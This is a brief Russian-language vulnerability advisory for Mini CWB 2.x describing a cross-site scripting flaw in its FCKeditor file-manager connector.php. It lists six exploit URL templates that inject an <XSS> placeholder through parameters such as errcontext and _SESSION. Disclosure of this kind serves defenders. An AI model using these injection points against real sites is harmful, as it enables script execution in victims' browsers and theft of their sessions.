Программа: Mini CWB 2.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценарием /javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
Эксплоит:
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?errcontext=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?_GET=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?_POST=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?_SESSION=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?_SERVER=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?fckphp_config[Debug_SERVER]=<XSS>